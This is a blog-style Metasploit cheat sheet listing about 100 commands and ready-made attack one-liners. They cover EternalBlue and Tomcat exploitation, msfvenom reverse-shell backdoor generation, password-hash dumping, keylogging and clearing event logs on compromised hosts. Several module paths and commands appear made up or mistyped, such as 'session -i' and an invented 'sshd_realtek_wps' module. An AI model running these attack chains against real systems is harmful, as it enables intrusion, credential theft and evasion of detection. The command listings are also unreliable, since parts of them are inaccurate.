Master Metasploit in 2025: Top 100 Commands Every Hacker Needs – With Bonus Penetration Testing Cheat Sheet

Master Metasploit in 2025: Top 100 Commands Every Hacker Needs – With Bonus Penetration Testing Cheat Sheet

☣️ Mr. The Plague ☣️

Metasploit is the ultimate penetration testing tool dominating cybersecurity in 2025. With a massive library of real-world exploits and seamless integration, it’s a must-have for hackers, red teamers, and security pros. This article delivers 100 essential Metasploit commands, paired with a bonus cheat sheet to supercharge your hacking skills.

Why Metasploit Rules in 2025

Metasploit, built by Rapid7, excels at simulating attacks with over 100,000 community-driven exploits. Its versatility—spanning scanning, exploitation, and post-exploitation—makes it indispensable for ethical hackers and penetration testers staying ahead in 2025.

Table of Contents

Basic Scanning

CommandDescription
msfconsoleLaunch the Metasploit console
helpDisplay all available commands
searchSearch for modules (e.g., search eternalblue)
useSelect a module (e.g., use 2)
optionsView module options
set RHOSTSSet target IP (e.g., set RHOSTS 192.168.1.1)
set RPORTSet target port (e.g., set RPORT 445)
set LHOSTSet local host IP
set LPORTSet local port (e.g., set LPORT 4444)
show optionsDisplay current options
show modulesList all modules
show exploitsList exploit modules
show auxiliaryList auxiliary modules
show payloadsList payloads
backExit module to main console
infoShow module details
checkCheck target vulnerability
connectOpen TCP connection to target
sessionsList active sessions
session -iInteract with session ID

Advanced Scanning

CommandDescription
use auxiliary/scanner/portscan/tcpTCP port scanner
set THREADSSet threads (e.g., set THREADS 50)
runExecute module
use auxiliary/scanner/http/http_versionEnumerate HTTP versions
set TARGETURISet URI (e.g., set TARGETURI /)
use auxiliary/scanner/smb/smb_versionScan SMB version
use auxiliary/scanner/ssh/ssh_loginAttempt SSH login
set USERNAMESet username (e.g., set USERNAME admin)
set PASSWORDSet password
use auxiliary/scanner/ftp/ftp_loginAttempt FTP login
use auxiliary/scanner/telnet/telnet_loginAttempt Telnet login
set VERBOSEEnable verbose output
use auxiliary/scanner/nmap/nmapIntegrate Nmap
set NMAP_OPTIONSSet Nmap options (e.g., -sV)
use auxiliary/server/capture/httpHTTP capture server
use auxiliary/server/capture/smtpSMTP capture server
use auxiliary/gather/service_enumEnumerate services
set TIMEOUTSet timeout (e.g., set TIMEOUT 30)
use auxiliary/scanner/dns/dns_brute_forceDNS brute force
use auxiliary/scanner/rdp/rdp_scannerScan RDP services

Exploitation

CommandDescription
use exploit/windows/smb/ms17_010_eternalblueEternalBlue exploit
set PAYLOADSet payload (e.g., windows/meterpreter/reverse_tcp)
exploitLaunch exploit
show targetsList exploit targets
set TARGETSet target ID (e.g., set TARGET 0)
use exploit/multi/http/tomcat_mgr_uploadTomcat manager exploit
set URISet URI (e.g., set URI /manager/html)
use exploit/linux/ssh/sshd_realtek_wpsSSH exploit
set USERPASS_FILESet credential file
use exploit/windows/ftp/proftpd_133c_backdoorProFTPD backdoor exploit
set BADCHARSAvoid chars (e.g., set BADCHARS "\x00")
use exploit/multi/browser/adobe_flash_hacking_team_uafFlash exploit
set ENCODINGSet payload encoding
use exploit/windows/local/bypassuacBypass UAC
set SESSIONSet session ID (e.g., set SESSION 1)
use exploit/linux/local/privilege_escalationPrivilege escalation
set FORCE_EXPLOITForce exploit execution
use exploit/multi/elasticsearch/search_grok_payload_execElasticsearch exploit
set PROXYSet proxy
use exploit/windows/http/iis_webdav_scstoragepathfromurlIIS WebDAV exploit

Payloads

CommandDescription
msfvenom -p windows/meterpreter/reverse_tcpWindows Meterpreter payload
msfvenom -l payloadsList payloads
msfvenom -f exeOutput as executable
msfvenom -e x86/shikata_ga_naiEncode with Shikata Ga Nai
msfvenom -a x86Set architecture (e.g., x86)
msfvenom -b “\x00”Avoid null bytes
msfvenom -i 3Encode 3 times
msfvenom -x template.exeUse template file
msfvenom -o output.exeSave to file
msfvenom -p linux/x86/shell/reverse_tcp LHOST=192.168.1.1 LPORT=4444Linux reverse shell
msfvenom -p java/meterpreter/reverse_tcp -f jarJava Meterpreter JAR
msfvenom -p php/meterpreter/reverse_tcp -f rawPHP Meterpreter
msfvenom -p python/meterpreter/reverse_tcp -f pyPython Meterpreter
msfvenom -p windows/x64/meterpreter/reverse_tcp -f dllWindows x64 DLL
msfvenom -hShow msfvenom help

Post-Exploitation

CommandDescription
sysinfoShow target system info
psList processes
killKill process (e.g., kill 1234)
getuidShow user ID
uploadUpload file (e.g., upload file.txt /tmp)
downloadDownload file (e.g., download /tmp/file.txt .)
pwdShow current directory
cdChange directory (e.g., cd /tmp)
catView file (e.g., cat /etc/passwd)
shellAccess shell
migrateSwitch process (e.g., migrate 1234)
hashdumpDump hashes
keyscan_startStart keylogger
keyscan_dumpDump keystrokes
clearevClear event logs

Integration

CommandDescription
msfdb initInitialize database
load nmapLoad Nmap extension
db_nmap -sV -ANmap scan to database
db_importImport scan results
hostsList database hosts
servicesList services
vulnsList vulnerabilities
db_export -f xmlExport to XML
use auxiliary/admin/scanner/nessus/nessus_loginNessus login scanner
set NESSUS_HOSTSet Nessus host (e.g., set NESSUS_HOST 192.168.1.1)

Real-World Power Moves

  • Network Scan: use auxiliary/scanner/portscan/tcp; set RHOSTS 192.168.1.0/24; run – Scan subnet for open ports.
  • HTTP Version Check: use auxiliary/scanner/http/http_version; set RHOSTS 10.0.0.1; run – Identify web server versions.
  • SMB Recon: use auxiliary/scanner/smb/smb_version; set RHOSTS 192.168.1.10; run – Detect SMB versions.
  • SSH Login Test: use auxiliary/scanner/ssh/ssh_login; set RHOSTS 10.0.0.2; set USERNAME admin; set PASSWORD pass; run – Test SSH credentials.
  • EternalBlue Exploit: use exploit/windows/smb/ms17_010_eternalblue; set RHOSTS 192.168.1.100; set PAYLOAD windows/meterpreter/reverse_tcp; exploit – Exploit Windows SMB.
  • Tomcat Attack: use exploit/multi/http/tomcat_mgr_upload; set RHOSTS 10.0.0.3; set URI /manager/html; exploit – Deploy payload via Tomcat.
  • Payload Generation: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f exe -o backdoor.exe – Create Windows backdoor.
  • Linux Shell: msfvenom -p linux/x86/shell/reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f elf -o shell.elf – Generate Linux reverse shell.
  • System Info: session -i 1; sysinfo – Get target system details.
  • Process List: session -i 1; ps – View running processes.
  • File Upload: session -i 1; upload /local/file.txt /remote/path – Transfer file to target.
  • Hash Dump: session -i 1; hashdump – Extract password hashes.
  • Keylogging: session -i 1; keyscan_start; keyscan_dump – Capture keystrokes.
  • Nmap Integration: load nmap; db_nmap -sV -A 192.168.1.0/24 – Scan and store results.
  • Database Export: db_export -f xml results.xml – Save scan data to XML.

Bonus Penetration Testing Cheat Sheet

Boost your Metasploit skills with these tools:

  • Burp Suite: Web app testing.
  • Nessus: Vulnerability scanning.
  • Wireshark: Packet analysis.
    Find more at SquidHacker.com.

Pro Tips for Metasploit Masters

  • Stay Updated: Run msfupdate weekly.
  • Verify Exploits: Cross-check results to avoid false positives.
  • Integrate: Pair with Nmap or Nessus for deeper scans.
  • Stay Legal: Test only authorized targets.
  • Tune Scans: Adjust THREADS for speed.

Conclusion

Metasploit’s 100 commands give you the edge in penetration testing for 2025. From scanning to exploitation, this guide equips you to dominate security assessments. Use it ethically, keep learning, and follow SquidHacker.com for more hardcore cybersecurity intel. Share this cheat sheet and own the hacking game!